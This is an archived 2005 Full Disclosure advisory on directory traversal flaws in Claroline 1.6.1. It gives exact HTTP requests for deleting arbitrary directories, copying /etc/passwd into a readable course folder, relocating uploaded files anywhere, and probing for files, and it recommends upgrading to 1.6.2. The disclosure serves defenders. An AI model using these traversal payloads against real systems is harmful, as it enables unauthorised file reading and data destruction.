Full Disclosure mailing list archives
Multiple directory traversal vulnerabilities in Claroline
From: "fdsf hfdhfjk" <robbedekeyzer () hotmail com>
Date: Fri, 12 Aug 2005 03:00:12 +0200
Product description: Claroline (http://www.claroline.net) is a free application based on PHP /MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the web.
Vulnerability: Claroline 1.6.1 is vulnerable to multiple directory traversal attacks. You have to have teacher privileges to perform any of these.
1) Arbitrary directory deletion GET /claroline/scorm/scormdocument.php?delete=/../../001Any directory owned by user www can be deleted, it does not have to be empty.
2) Arbitrary file reading POST /claroline/document/document.phpcontent: move_file=%2F../../../../../../../../etc/passwd&move_to=%2F&move_file_submit=OK
Then: GET /courses/2510/document/passwd (where 2510 is the course id) 3) Arbitrary file creationWith /claroline/document/document.php, one can upload any file with any content (no php files) Using the same vulnerability as (2), one could move this file to anywhere on the system.
POST /claroline/document/document.php content: move_file=%2Ffile.cgi&move_to=%2F../..&move_file_submit=OK 4) Checking if certain files exist on the system (much less critical)GET /claroline/scorm/showinframes.php?openfirst=yes&indexRoute=&file=/tmp/test.txt
GET /claroline/scorm/contents.php?file=/tmp%2Ftest.txtSolution: upgrade to version 1.6.2, the latest release, available at http://www.claroline.net/download.htm
Robbe De Keyzer (robbedekeyzer () hotmail com) August 12, 2005 _________________________________________________________________ Gratis bloggen op MSN Spaces http://spaces.msn.com/?mkt=nl-be _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple directory traversal vulnerabilities in Claroline fdsf hfdhfjk (Aug 12)